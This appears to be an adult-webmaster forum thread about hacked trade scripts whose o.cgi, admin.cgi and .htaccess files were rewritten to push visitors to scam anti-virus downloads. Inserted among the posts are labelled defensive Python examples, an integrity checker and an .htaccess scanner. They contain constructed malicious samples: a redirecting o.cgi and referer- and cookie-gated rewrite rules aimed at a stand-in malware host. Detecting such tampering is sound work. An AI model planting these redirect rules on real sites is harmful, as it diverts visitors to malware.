Full Version: TGP Exploit - Affecting ATX and TE
PornStarKings > General > Webmaster Gossip
dready
I just got hit again, and it seems I'm not the only one. Check your sites!!

Open IE8 (you must use IE) to about:blank and clear your history / cache.

Go to your page. If you've been infected, the second hit out through your trade script will go to some scam anti-virus download page.

To be extra sure, after clearing your cache, load your page by clicking on someone else's site, rather than typing it in or using a bookmark. Load another TGP that has you in the toplist, and then click to your site.

This affects sites using both ATX and Trade Expert (possibly TP too, but not sure). They are overwriting the o.cgi file to steal your traffic, and admin.cgi so they can edit the file integrity tool to cover their tracks.

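The post above makes two points a practitioner should keep together: the out script (o.cgi) is being replaced, and admin.cgi is being replaced so the trade script's own file integrity tool stops reporting it. A checker that lives inside the web root, writable by the same user the attackers are writing as, cannot be trusted. The script below is an added example (not code from this thread and not part of ATX or Trade Expert) of an out-of-band baseline: hashes, sizes and permission bits of the watched files are stored outside the web root, and the comparison is run from there. The file names are the ones named in the thread; the directory layout and sample file contents are constructed for the demo.

```python
"""Out-of-band integrity baseline for a trade script's files.

Added example; not code from this thread or from ATX / Trade Expert. The
attackers described above rewrite admin.cgi so the script's own file
integrity tool no longer reports the change, so the baseline and the
checker have to live outside the web root in a location the web server's
user cannot write. File names come from the thread; the directory layout
and sample file contents are constructed for the demo.
"""
import hashlib
import json
import stat
import tempfile
from pathlib import Path

WATCHED = ["o.cgi", "admin.cgi", ".htaccess"]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(webroot: Path, names=WATCHED) -> dict:
    """Record hash, size and permission bits for each watched file (None if absent)."""
    out = {}
    for name in names:
        p = webroot / name
        if p.is_file():
            st = p.stat()
            out[name] = {"sha256": sha256_file(p), "size": st.st_size,
                         "mode": stat.S_IMODE(st.st_mode)}
        else:
            out[name] = None
    return out


def save_baseline(webroot: Path, baseline_path: Path) -> None:
    """Write the baseline outside the web root and make it read-only for its owner."""
    baseline_path.write_text(json.dumps(snapshot(webroot), indent=2, sort_keys=True))
    baseline_path.chmod(0o400)


def check(webroot: Path, baseline_path: Path) -> list:
    """Return (file, reason) pairs for every deviation from the saved baseline."""
    baseline = json.loads(baseline_path.read_text())
    current = snapshot(webroot, list(baseline))
    findings = []
    for name, base in baseline.items():
        cur = current[name]
        if base is None and cur is not None:
            findings.append((name, "appeared"))
        elif base is not None and cur is None:
            findings.append((name, "missing"))
        elif base is not None and base != cur:
            if base["sha256"] != cur["sha256"]:
                findings.append((name, "content changed"))
            if base["mode"] != cur["mode"]:
                findings.append((name, "permissions changed to %o" % cur["mode"]))
    return findings


def demo() -> list:
    """Build a throwaway web root, baseline it, tamper with o.cgi, return the findings."""
    root = Path(tempfile.mkdtemp())
    web, private = root / "public_html", root / "private"
    web.mkdir()
    private.mkdir()
    (web / "o.cgi").write_text("#!/usr/bin/perl\n# constructed sample out script\n")
    (web / "admin.cgi").write_text("#!/usr/bin/perl\n# constructed sample admin script\n")
    (web / ".htaccess").write_text("Options -Indexes\n")
    save_baseline(web, private / "baseline.json")
    # Simulate the compromise: the out script is replaced by a redirector.
    (web / "o.cgi").write_text('#!/usr/bin/perl\nprint "Location: http://attacker.invalid/\\r\\n\\r\\n";\n')
    return check(web, private / "baseline.json")


if __name__ == "__main__":
    for name, reason in demo():
        print(f"ALERT {name}: {reason}")
```

Run `save_baseline` once after a clean install or a verified cleanup, from an account other than the web server's, and run `check` from cron on the same account. Because the baseline file is outside the web root and not writable by the httpd user, an attacker who only has the web server's privileges cannot edit it the way they edited admin.cgi; if they can, they have more than the web account, which is the "flush the OS" situation described further down the thread.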
Famous
QUOTE(dready @ Feb 18 2010, 11:54 AM)
I just got hit again, and it seems I'm not the only one. Check your sites!!

Open IE8 (you must use IE) to about:blank and clear your history / cache.

Go to your page. If you've been infected, the second hit out through your trade script will go to some scam anti-virus download page.

To be extra sure, after clearing your cache, load your page by clicking on someone else's site, rather than typing it in or using a bookmark. Load another TGP that has you in the toplist, and then click to your site.

This affects sites using both ATX and Trade Expert (possibly TP too, but not sure). They are overwriting the o.cgi file to steal your traffic, and admin.cgi so they can edit the file integrity tool to cover their tracks.

These fuckers are getting smarter and smarter, man.
PAR
Well, easy fix..
Companies need to tell you how to change the name of those two files and not have it kill the software.

Then it will be harder for people to target the sites.

I do this for all my Joomla sites.

Or better yet, they could just set up a file that you name.
This file is then controlled by a simple admin on setup of the site or on update.
Letting you change a number of possible file names that will have weak security settings due to rw- rules.
gamebp
I don't know if it is the same thing

img693.imageshack.us/img693/3323/tgpx.jpg

stevo
Yeah, I got hit too, and I didn't fix it in time... Now I'm losing thousands of hits every day due to Google's "This site may harm your computer."
dready
QUOTE(stevo @ Mar 6 2010, 06:44 PM)
Yeah, I got hit too, and I didn't fix it in time... Now I'm losing thousands of hits every day due to Google's "This site may harm your computer."

Who are you hosting with?
Famous
Yep, I got nailed in the nuts on this too. If you got hit, PM me and I will send you what I did. It's my best attempt at fixing it. If they still get in and change the outs, then they have shell access and you need to flush the OS.
Famous
Let's add a new twist to this shit. Now I've got partner-submitted galleries that are hacked, lol.

1. Restart your modem (you need a fresh IP; if you are on a static IP it's going to be hard to catch).
2. Go to http://www.ultra-pornstars.com
3. Go to the bottom to the toplist and click my site famouspornstars.com
4. Go to the very bottom of my site and you will see test1. It is a straight link to the gallery and not through any script. And boom, first click I get popped.

And the plot thickens....
Famous
And confirmed: it is definitely the submitted gallery. Had my friend add a link from his TGP (he's on a Windows box) and it redirects for him as well.
PAR
Hey Famous, let me know if that mod_rewrite fix works for you..
If not, go with that other fix we talked about.

If possible you may want to leave the out.php or o.cgi file around but clear it out..

So a ping to the file is still there and the hackers have to start doing bot scans for the new file names.. it will just add one more step.. and edit the file name monthly or daily..

If daily, and you use mod_rewrite to direct to the correct file name, then you can write a small script that will rename the file daily..
JohnTO
QUOTE(Famous @ Mar 8 2010, 03:26 PM)
Let's add a new twist to this shit. Now I've got partner-submitted galleries that are hacked, lol.

1. Restart your modem (you need a fresh IP; if you are on a static IP it's going to be hard to catch).
2. Go to http://www.ultra-pornstars.com
3. Go to the bottom to the toplist and click my site famouspornstars.com
4. Go to the very bottom of my site and you will see test1. It is a straight link to the gallery and not through any script. And boom, first click I get popped.

And the plot thickens....

I get popped both when leaving UP (or entering FP, not sure)
http://www.streamate.com/cam/Tammy_Moore/?...HNSMTY=303&lp=1

and when clicking the test link (livejazmin.com)

and that's on Firefox too
Famous
QUOTE(JohnTO @ Mar 8 2010, 06:43 PM)
I get popped both when leaving UP (or entering FP, not sure)
http://www.streamate.com/cam/Tammy_Moore/?...HNSMTY=303&lp=1

and when clicking the test link (livejazmin.com)

and that's on Firefox too

Yeah, the livejasmin is a popunder I sell and the streamate is one that dready sells. The bad one is when you click that link at the bottom and it tries to install shit on your PC.
binkatl
I got both popunders, but nothing tried to install. I'm on a Mac, so it wouldn't actually install, but it would have downloaded something that would end up being harmless on my computer. But no downloads...

Famous
QUOTE(binkatl @ Mar 9 2010, 11:35 AM)
I got both popunders, but nothing tried to install. I'm on a Mac, so it wouldn't actually install, but it would have downloaded something that would end up being harmless on my computer. But no downloads...

Yeah, mine's cleaned off. Go to the very, very, very bottom of the page and there is a test1 link that goes to a submitter's gallery that was infected.
PAR
QUOTE(Famous @ Mar 9 2010, 02:12 AM)
Yeah, the livejasmin is a popunder I sell and the streamate is one that dready sells. The bad one is when you click that link at the bottom and it tries to install shit on your PC.

No longer see the test link so I could not see what's going on.

QUOTE(binkatl @ Mar 9 2010, 12:35 PM)
I got both popunders, but nothing tried to install. I'm on a Mac, so it wouldn't actually install, but it would have downloaded something that would end up being harmless on my computer. But no downloads...

Won't hurt your Mac, but it will tunnel to any PC on your network, or can still self-attach in emails and other files a PC may touch..

So you are an uninfected carrier, and the PC is infected.. Mac long ago removed the ability to remove viruses that could infect PCs in a Mac/PC environment...
Famous
QUOTE(PAR @ Mar 9 2010, 02:56 PM)
No longer see the test link so I could not see what's going on.
Won't hurt your Mac, but it will tunnel to any PC on your network, or can still self-attach in emails and other files a PC may touch..

So you are an uninfected carrier, and the PC is infected.. Mac long ago removed the ability to remove viruses that could infect PCs in a Mac/PC environment...

It's clean now, I restarted it this morning. They got into his server and edited the .htaccess files.
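The behaviour reported throughout this thread (the redirect fires only when you arrive from another site, only on the second hit, and goes to an off-site "anti-virus" page) is what a RewriteCond on HTTP_REFERER or HTTP_COOKIE produces, and the .htaccess edit Famous mentions here is where such rules would land. A direct visit with a warm cache looks clean for the same reason. The scanner below is an added example, not code from this thread: it parses .htaccess text and flags every RewriteRule, Redirect, RedirectMatch or ErrorDocument whose target is an absolute URL on a host other than the site's own, and records which request headers the preceding RewriteCond lines gate it on. The site hostnames and the sample .htaccess (including the ".invalid" attacker host) are constructed.

```python
"""Flag conditional off-site redirects in .htaccess text.

Added example, not from this thread. Scans for RewriteRule / Redirect /
RedirectMatch / ErrorDocument targets on a foreign host and reports which
request headers (referer, cookie, user agent) the preceding RewriteCond
lines gate them on. OWN_HOSTS and SAMPLE_HTACCESS are constructed.
"""
import re
from urllib.parse import urlparse

OWN_HOSTS = {"example-tgp.com", "www.example-tgp.com"}  # assumed: the site's own names

GATE_VARS = ("HTTP_REFERER", "HTTP_COOKIE", "HTTP_USER_AGENT")
COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
REDIRECT_RE = re.compile(r"^(Redirect(?:Match)?)\s+(?:\d{3}\s+|\w+\s+)?(\S+)\s+(\S+)", re.I)
ERRDOC_RE = re.compile(r"^ErrorDocument\s+(\d{3})\s+(\S+)", re.I)

# Constructed sample: two legitimate rules, then the kind of rules seen after a compromise.
SAMPLE_HTACCESS = """\
# constructed sample .htaccess
Options -Indexes
RewriteEngine On
RewriteRule ^gallery/(\\d+)$ /show.cgi?id=$1 [L]
RewriteRule ^old-out$ https://www.example-tgp.com/o.cgi [R=301,L]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !example-tgp\\.com [NC]
RewriteCond %{HTTP_COOKIE} !visited=1
RewriteRule ^(.*)$ http://malware-dropper.invalid/av-scan.php [R=302,L]
ErrorDocument 404 http://malware-dropper.invalid/404.php
"""


def offsite(target: str, own_hosts=OWN_HOSTS):
    """Return the foreign host if `target` is an absolute URL to another host, else None."""
    u = urlparse(target)
    if u.scheme in ("http", "https") and u.hostname and u.hostname.lower() not in own_hosts:
        return u.hostname.lower()
    return None


def scan(text: str, own_hosts=OWN_HOSTS) -> list:
    """One finding per directive that sends visitors off-site, with its RewriteCond gates."""
    findings = []
    pending = []  # RewriteCond (variable, pattern) pairs waiting for the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if m:
            host = offsite(m.group(2), own_hosts)
            if host:
                gates = sorted({v for v, _ in pending if v in GATE_VARS})
                findings.append({"line": lineno, "directive": "RewriteRule", "host": host,
                                 "gated_on": gates, "flags": m.group(3) or ""})
            pending = []  # conditions apply only to the RewriteRule that follows them
            continue
        m = REDIRECT_RE.match(line)
        if m:
            host = offsite(m.group(3), own_hosts)
            if host:
                findings.append({"line": lineno, "directive": m.group(1), "host": host,
                                 "gated_on": [], "flags": ""})
            continue
        m = ERRDOC_RE.match(line)
        if m:
            host = offsite(m.group(2), own_hosts)
            if host:
                findings.append({"line": lineno, "directive": "ErrorDocument", "host": host,
                                 "gated_on": [], "flags": ""})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_HTACCESS):
        gate = " gated on %s" % ", ".join(f["gated_on"]) if f["gated_on"] else ""
        print("line %d: %s -> %s%s" % (f["line"], f["directive"], f["host"], gate))
```

Run it over every .htaccess under the web root (the partner's server in this case had more than one) and treat any finding gated on HTTP_REFERER or HTTP_COOKIE as the injected rule; a legitimate redirect to your own host, like line 5 of the sample, is not reported.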
PAR
QUOTE(Famous @ Mar 9 2010, 07:47 PM)
It's clean now, I restarted it this morning. They got into his server and edited the .htaccess files.

Oh great...
Well, at least they left the sites live and didn't lock you out.

Or turn it into a rickroll..
Famous
QUOTE(PAR @ Mar 9 2010, 09:58 PM)
Oh great...
Well, at least they left the sites live and didn't lock you out.

Or turn it into a rickroll..

:P